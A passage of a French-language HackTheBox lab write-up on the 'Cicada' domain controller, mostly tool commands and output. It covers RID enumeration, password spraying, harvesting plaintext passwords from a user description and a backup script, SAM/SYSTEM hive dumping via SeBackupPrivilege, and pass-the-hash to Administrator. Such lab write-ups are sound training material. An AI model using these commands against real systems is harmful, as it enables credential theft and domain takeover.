class="s1">&#39;cicada.htb&#39;</span> --rid-brute </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>*<span class="o">]</span> Windows 10.0 Build <span class="m">20348</span> x64 <span class="o">(</span>name:CICADA-DC<span class="o">)</span> <span class="o">(</span>domain:cicada.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>+<span class="o">]</span> cicada.htb<span class="se">\g</span>uest: </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 498: CICADA<span class="se">\E</span>nterprise Read-only Domain Controllers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 500: CICADA<span class="se">\A</span>dministrator <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 501: CICADA<span class="se">\G</span>uest <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 502: CICADA<span class="se">\k</span>rbtgt <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 512: CICADA<span class="se">\D</span>omain Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 513: CICADA<span class="se">\D</span>omain Users <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 514: CICADA<span class="se">\D</span>omain Guests <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 515: CICADA<span class="se">\D</span>omain Computers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 516: CICADA<span class="se">\D</span>omain Controllers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 517: CICADA<span class="se">\C</span>ert Publishers <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 518: CICADA<span class="se">\S</span>chema Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 519: CICADA<span class="se">\E</span>nterprise Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 520: CICADA<span class="se">\G</span>roup Policy Creator Owners <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 521: CICADA<span class="se">\R</span>ead-only Domain Controllers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 522: CICADA<span class="se">\C</span>loneable Domain Controllers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 525: CICADA<span class="se">\P</span>rotected Users <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 526: CICADA<span class="se">\K</span>ey Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 527: CICADA<span class="se">\E</span>nterprise Key Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 553: CICADA<span class="se">\R</span>AS and IAS Servers <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 571: CICADA<span class="se">\A</span>llowed RODC Password Replication Group <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 572: CICADA<span class="se">\D</span>enied RODC Password Replication Group <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 1000: CICADA<span class="se">\C</span>ICADA-DC$ <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 1101: CICADA<span class="se">\D</span>nsAdmins <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 1102: CICADA<span class="se">\D</span>nsUpdateProxy <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 1103: CICADA<span class="se">\G</span>roups <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 1104: CICADA<span class="se">\j</span>ohn.smoulder <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 1105: CICADA<span class="se">\s</span>arah.dantelia <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 1106: CICADA<span class="se">\m</span>ichael.wrightson <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 1108: CICADA<span class="se">\d</span>avid.orelious <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 1109: CICADA<span class="se">\D</span>ev Support <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 1601: CICADA<span class="se">\e</span>mily.oscars <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><p>On a donc une liste d&rsquo;utilisateur probable:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="nx">john</span><span class="o">.</span><span class="nx">smoulder</span> </span></span><span class="line"><span class="cl"><span class="nx">sarah</span><span class="o">.</span><span class="nx">dantelia</span> </span></span><span class="line"><span class="cl"><span class="nx">michael</span><span class="o">.</span><span class="nx">wrightson</span> </span></span><span class="line"><span class="cl"><span class="nx">david</span><span class="o">.</span><span class="nx">orelious</span> </span></span><span class="line"><span class="cl"><span class="nx">emily</span><span class="o">.</span><span class="nx">oscars</span> </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.11.35 -u users.txt -p <span class="s1">&#39;Cicada$M6Corpb*@Lp#nZp!8&#39;</span> -d <span class="s1">&#39;cicada.htb&#39;</span> --users </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>*<span class="o">]</span> Windows 10.0 Build <span class="m">20348</span> x64 <span class="o">(</span>name:CICADA-DC<span class="o">)</span> <span class="o">(</span>domain:cicada.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>-<span class="o">]</span> cicada.htb<span class="se">\j</span>ohn.smoulder:Cicada<span class="nv">$M6Corpb</span>*@Lp#nZp!8 STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>-<span class="o">]</span> cicada.htb<span class="se">\s</span>arah.dantelia:Cicada<span class="nv">$M6Corpb</span>*@Lp#nZp!8 STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>+<span class="o">]</span> cicada.htb<span class="se">\m</span>ichael.wrightson:Cicada<span class="nv">$M6Corpb</span>*@Lp#nZp!8 </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>*<span class="o">]</span> Trying to dump <span class="nb">local</span> users with SAMRPC protocol </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>+<span class="o">]</span> Enumerated domain user<span class="o">(</span>s<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC cicada.htb<span class="se">\A</span>dministrator Built-in account <span class="k">for</span> administering the computer/domain </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC cicada.htb<span class="se">\G</span>uest Built-in account <span class="k">for</span> guest access to the computer/domain </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC cicada.htb<span class="se">\k</span>rbtgt Key Distribution Center Service Account </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC cicada.htb<span class="se">\j</span>ohn.smoulder </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC cicada.htb<span class="se">\s</span>arah.dantelia </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC cicada.htb<span class="se">\m</span>ichael.wrightson </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC cicada.htb<span class="se">\d</span>avid.orelious Just in <span class="k">case</span> I forget my password is aRt<span class="nv">$Lp</span><span class="c1">#7t*VQ!3</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC cicada.htb<span class="se">\e</span>mily.oscars </span></span></code></pre></td></tr></table> </div> </div><p>On obtient un nouvel utilisateur ce qui nous donne deux comptes:</p> <p>michael.wrightson:<code>Cicada$M6Corpb*@Lp#nZp!8</code> david.orelious:<code>aRt$Lp#7t*VQ!3</code></p> <h3 id="smb-dev-share--david">SMB DEV share : david </h3><p>On observe que david.orelious a un acces au SMB <code>DEV</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nxc smb 10.10.11.35 -u <span class="s1">&#39;david.orelious&#39;</span> -p <span class="s1">&#39;aRt$Lp#7t*VQ!3&#39;</span> -d <span class="s1">&#39;cicada.htb&#39;</span> --shares </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>*<span class="o">]</span> Windows 10.0 Build <span class="m">20348</span> x64 <span class="o">(</span>name:CICADA-DC<span class="o">)</span> <span class="o">(</span>domain:cicada.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>+<span class="o">]</span> cicada.htb<span class="se">\d</span>avid.orelious:aRt<span class="nv">$Lp</span><span class="c1">#7t*VQ!3 </span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>*<span class="o">]</span> Enumerated shares </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC Share Permissions Remark </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC ----- ----------- ------ </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC ADMIN$ Remote Admin </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC C$ Default share </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC DEV READ </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC HR READ </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC IPC$ READ Remote IPC </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC NETLOGON READ Logon server share </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC SYSVOL READ Logon server share </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ smbclient //10.10.11.35/DEV -U <span class="s1">&#39;david.orelious&#39;</span> </span></span><span class="line"><span class="cl">Password <span class="k">for</span> <span class="o">[</span>WORKGROUP<span class="se">\d</span>avid.orelious<span class="o">]</span>: </span></span><span class="line"><span class="cl">Try <span class="s2">&#34;help&#34;</span> to get a list of possible commands. </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . D <span class="m">0</span> Thu Mar <span class="m">14</span> 08:31:39 <span class="m">2024</span> </span></span><span class="line"><span class="cl"> .. D <span class="m">0</span> Thu Mar <span class="m">14</span> 08:21:29 <span class="m">2024</span> </span></span><span class="line"><span class="cl"> Backup_script.ps1 A <span class="m">601</span> Wed Aug <span class="m">28</span> 13:28:22 <span class="m">2024</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">4168447</span> blocks of size 4096. <span class="m">403603</span> blocks available </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> get Backup_script.ps1 </span></span><span class="line"><span class="cl">getting file <span class="se">\B</span>ackup_script.ps1 of size <span class="m">601</span> as Backup_script.ps1 <span class="o">(</span>3.1 KiloBytes/sec<span class="o">)</span> <span class="o">(</span>average 3.1 KiloBytes/sec<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><p>On a obtenu un script dans dev avec le mot de passe de <strong>emily.oscars</strong> en clair :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ cat Backup_script.ps1 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$sourceDirectory</span> <span class="o">=</span> <span class="s2">&#34;C:\smb&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$destinationDirectory</span> <span class="o">=</span> <span class="s2">&#34;D:\Backup&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$username</span> <span class="o">=</span> <span class="s2">&#34;emily.oscars&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$password</span> <span class="o">=</span> ConvertTo-SecureString <span class="s2">&#34;Q!3@Lp#M6b*7t*Vt&#34;</span> -AsPlainText -Force </span></span><span class="line"><span class="cl"><span class="nv">$credentials</span> <span class="o">=</span> New-Object System.Management.Automation.PSCredential<span class="o">(</span><span class="nv">$username</span>, <span class="nv">$password</span><span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$dateStamp</span> <span class="o">=</span> Get-Date -Format <span class="s2">&#34;yyyyMMdd_HHmmss&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$backupFileName</span> <span class="o">=</span> <span class="s2">&#34;smb_backup_</span><span class="nv">$dateStamp</span><span class="s2">.zip&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$backupFilePath</span> <span class="o">=</span> Join-Path -Path <span class="nv">$destinationDirectory</span> -ChildPath <span class="nv">$backupFileName</span> </span></span><span class="line"><span class="cl">Compress-Archive -Path <span class="nv">$sourceDirectory</span> -DestinationPath <span class="nv">$backupFilePath</span> </span></span><span class="line"><span class="cl">Write-Host <span class="s2">&#34;Backup completed successfully. Backup file saved to: </span><span class="nv">$backupFilePath</span><span class="s2">&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Compte utilisateur: emily.oscars:<code>Q!3@Lp#M6b*7t*Vt</code></p> <h3 id="smb-admin-access--evil-winrm-user-flag">SMB ADMIN ACCESS / Evil-winrm (user flag) </h3><p>On observe que emily a des droits intéressants sur les shares SMB ADMIN$ et C$ :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.11.35 -u emily.oscars -p <span class="s1">&#39;Q!3@Lp#M6b*7t*Vt&#39;</span> -d <span class="s1">&#39;cicada.htb&#39;</span> --shares </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>*<span class="o">]</span> Windows 10.0 Build <span class="m">20348</span> x64 <span class="o">(</span>name:CICADA-DC<span class="o">)</span> <span class="o">(</span>domain:cicada.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>+<span class="o">]</span> cicada.htb<span class="se">\e</span>mily.oscars:Q!3@Lp#M6b*7t*Vt </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>*<span class="o">]</span> Enumerated shares </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC Share Permissions Remark </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC ----- ----------- ------ </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC ADMIN$ READ Remote Admin </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC C$ READ,WRITE Default share </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC DEV </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC HR READ </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC IPC$ READ Remote IPC </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC NETLOGON READ Logon server share </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC SYSVOL READ Logon server share </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ smbclient //10.10.11.35/ADMIN$ -U <span class="s1">&#39;emily.oscars%Q!3@Lp#M6b*7t*Vt&#39;</span> </span></span><span class="line"><span class="cl"><span class="c1">##OR</span> </span></span><span class="line"><span class="cl">sudo apt install cifs-utils -y </span></span><span class="line"><span class="cl">sudo mount -t cifs //10.10.11.35/ADMIN$ /mnt/smb -o <span class="nv">username</span><span class="o">=</span><span class="s1">&#39;emily.oscars&#39;</span>,password<span class="o">=</span><span class="s1">&#39;Q!3@Lp#M6b*7t*Vt&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ evil-winrm -i 10.10.11.35 -u emily.oscars -p <span class="s1">&#39;Q!3@Lp#M6b*7t*Vt&#39;</span> </span></span><span class="line"><span class="cl">$ <span class="nb">cd</span> Desktop </span></span><span class="line"><span class="cl">$ cat user.txt </span></span><span class="line"><span class="cl">5297.....2a75 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="enumeration-with-emilyoscars">Enumeration with emily.oscars </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\e</span>mily.oscars.CICADA<span class="se">\D</span>ocuments&gt; whoami /priv </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PRIVILEGES INFORMATION </span></span><span class="line"><span class="cl">---------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Privilege Name Description <span class="nv">State</span> </span></span><span class="line"><span class="cl"><span class="o">=============================</span> <span class="o">==============================</span> <span class="o">=======</span> </span></span><span class="line"><span class="cl">SeBackupPrivilege Back up files and directories Enabled </span></span><span class="line"><span class="cl">SeRestorePrivilege Restore files and directories Enabled </span></span><span class="line"><span class="cl">SeShutdownPrivilege Shut down the system Enabled </span></span><span class="line"><span class="cl">SeChangeNotifyPrivilege Bypass traverse checking Enabled </span></span><span class="line"><span class="cl">SeIncreaseWorkingSetPrivilege Increase a process working <span class="nb">set</span> Enabled </span></span></code></pre></td></tr></table> </div> </div><h3 id="exploit-sebackupprivilege">Exploit SeBackupPrivilege </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ reg save hklm<span class="se">\s</span>am . </span></span><span class="line"><span class="cl">$ reg save hklm<span class="se">\s</span>ystem . </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ pypykatz registry --sam sam.hive system.hive </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">WARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work </span></span><span class="line"><span class="cl">WARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not <span class="nv">work</span> </span></span><span class="line"><span class="cl"><span class="o">==============</span> SYSTEM hive <span class="nv">secrets</span> <span class="o">==============</span> </span></span><span class="line"><span class="cl">CurrentControlSet: ControlSet001 </span></span><span class="line"><span class="cl">Boot Key: <span class="nv">3c2b033757a49110a9ee680b46e8d620</span> </span></span><span class="line"><span class="cl"><span class="o">==============</span> SAM hive <span class="nv">secrets</span> <span class="o">==============</span> </span></span><span class="line"><span class="cl">HBoot Key: a1c299e572ff8c643a857d3fdb3e5c7c10101010101010101010101010101010 </span></span><span class="line"><span class="cl">Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341::: </span></span><span class="line"><span class="cl">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl">DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl">WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ evil-winrm -i 10.10.11.35 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.5 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="o">()</span> <span class="k">function</span> is unimplemented on this machine </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; <span class="nb">cd</span> ../desktop </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\d</span>esktop&gt; cat root.txt </span></span><span class="line"><span class="cl">e39c.....9300 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/administrator-htb/Sun, 01 Dec 2024 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/administrator-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Administrator cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Administrator</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.42</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span 